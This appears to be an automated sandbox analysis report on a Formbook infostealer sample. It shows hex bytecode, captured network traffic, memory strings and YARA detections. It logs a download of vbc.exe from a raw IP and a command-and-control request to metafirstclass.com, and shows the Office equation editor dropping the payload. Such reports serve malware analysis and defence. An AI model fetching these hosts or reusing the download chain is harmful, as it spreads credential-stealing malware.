00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1
          Source: global trafficHTTP traffic detected: GET /384500000_1/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 202.55.132.154Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: schtasks.exe, 00000007.00000002.463015056.0000000001D80000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.493199905.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.493703831.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.487992474.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAC3DEF.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.metafirstclass.com
          Source: global trafficHTTP traffic detected: GET /384500000_1/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 202.55.132.154Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1Host: www.metafirstclass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
